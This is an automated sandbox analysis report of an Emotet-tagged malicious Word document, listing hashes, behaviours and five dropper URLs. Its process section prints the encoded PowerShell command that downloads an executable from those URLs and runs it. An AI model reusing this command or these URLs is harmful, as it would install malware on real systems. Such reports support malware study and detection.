Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Resubmissions

17-07-2020 17:34

200717-11ew4vhpq6 10

17-07-2020 17:19

200717-bsfqa8665j 8

Analysis

  • max time kernel
    60s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    17-07-2020 17:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7bf808ea3b70583a98b450b147880dd741c863b82bd064df6f773a9562a5a6b1.doc

  • Size

    188KB

  • MD5

    916161ce414c12d8c489a44c9cd81026

  • SHA1

    b919f28eb70f4c84de1715d9b70489d172153004

  • SHA256

    7bf808ea3b70583a98b450b147880dd741c863b82bd064df6f773a9562a5a6b1

  • SHA512

    dd814df4b53b99eb4287cfe3bb9772eab728d516d43a36621a6bd2106018324fe6d2dc1321717158d32ec4cd996b2194e21cb05c78604c1b4de0abae23a6fe85

Score
10/10
discovery

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://ramukakaonline.com/wp-includes/cxSzmSXN/
exe.dropper

http://shubhinfoways.com/p/XEcc5x1qx73/
exe.dropper

http://test2.cxyw.net/hyeht3/aWybkzi/
exe.dropper

http://sustainableandorganicgarments.com/komentarz/KHF6ry92657/
exe.dropper

http://staging.icuskin.com/wp-content/o5hhrj8wvfv372729/

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7bf808ea3b70583a98b450b147880dd741c863b82bd064df6f773a9562a5a6b1.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1144
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AHQAcABzADoALwAvAHIAYQBtAHUAawBhAGsAYQBvAG4AbABpAG4AZQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwB4AFMAegBtAFMAWABOAC8AKgBoAHQAdABwADoALwAvAHMAaAB1AGIAaABpAG4AZgBvAHcAYQB5AHMALgBjAG8AbQAvAHAALwBYAEUAYwBjADUAeAAxAHEAeAA3ADMALwAqAGgAdAB0AHAAOgAvAC8AdABlAHMAdAAyAC4AYwB4AHkAdwAuAG4AZQB0AC8AaAB5AGUAaAB0ADMALwBhAFcAeQBiAGsAegBpAC8AKgBoAHQAdABwADoALwAvAHMAdQBzAHQAYQBpAG4AYQBiAGwAZQBhAG4AZABvAHIAZwBhAG4AaQBjAGcAYQByAG0AZQBuAHQAcwAuAGMAbwBtAC8AawBvAG0AZQBuAHQAYQByAHoALwBLAEgARgA2AHIAeQA5ADIANgA1ADcALwAqAGgAdAB0AHAAOgAvAC8AcwB0AGEAZwBpAG4AZwAuAGkAYwB1AHMAawBpAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBvADUAaABoAHIAagA4AHcAdgBmAHYAMwA3ADIANwAyADkALwAnAC4AIgBzAGAAcABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAHcAYQBpAGQAagBpAHIAawBlAGkAYwBoAGIAbwB1AHMAZgBvAGEAYgA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgAiAEcAYABlAFQAVABgAGUATQBwAFAAQQBgAFQAaAAiACgAKQArACcAXABzAGUAeQB6AG8AdQBwAGgAZQBhAHQAaAAuAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHQAdQB1AHQAbABvAGUAYwBuAGEAdQBjAGcAdQB1AHQAdgBlAGkAZgAgAGkAbgAgACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQApAHsAdAByAHkAewAmACgAJwBTAHQAYQByAHQALQBCACcAKwAnAGkAdABzAFQAcgAnACsAJwBhACcAKwAnAG4AcwBmAGUAcgAnACkAIAAtAFMAbwB1AHIAYwBlACAAJAB0AHUAdQB0AGwAbwBlAGMAbgBhAHUAYwBnAHUAdQB0AHYAZQBpAGYAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAdwBhAGkAZABqAGkAcgBrAGUAaQBjAGgAYgBvAHUAcwBmAG8AYQBiADsALgAoACcAUwAnACsAJwB0AGEAJwArACcAcgB0AC0AUAByAG8AJwArACcAYwBlAHMAcwAnACkAIAAkAHcAYQBpAGQAagBpAHIAawBlAGkAYwBoAGIAbwB1AHMAZgBvAGEAYgA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9AA==
    1⤵
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:1056

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1144-0-0x0000000006D50000-0x0000000006E50000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/1144-2-0x0000000008D00000-0x0000000008D04000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1144-5-0x000000000B2D0000-0x000000000B2D4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1144-6-0x000000000C350000-0x000000000C354000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1144-8-0x0000000002100000-0x0000000002101000-memory.dmp

    Filesize

    4KB

    Download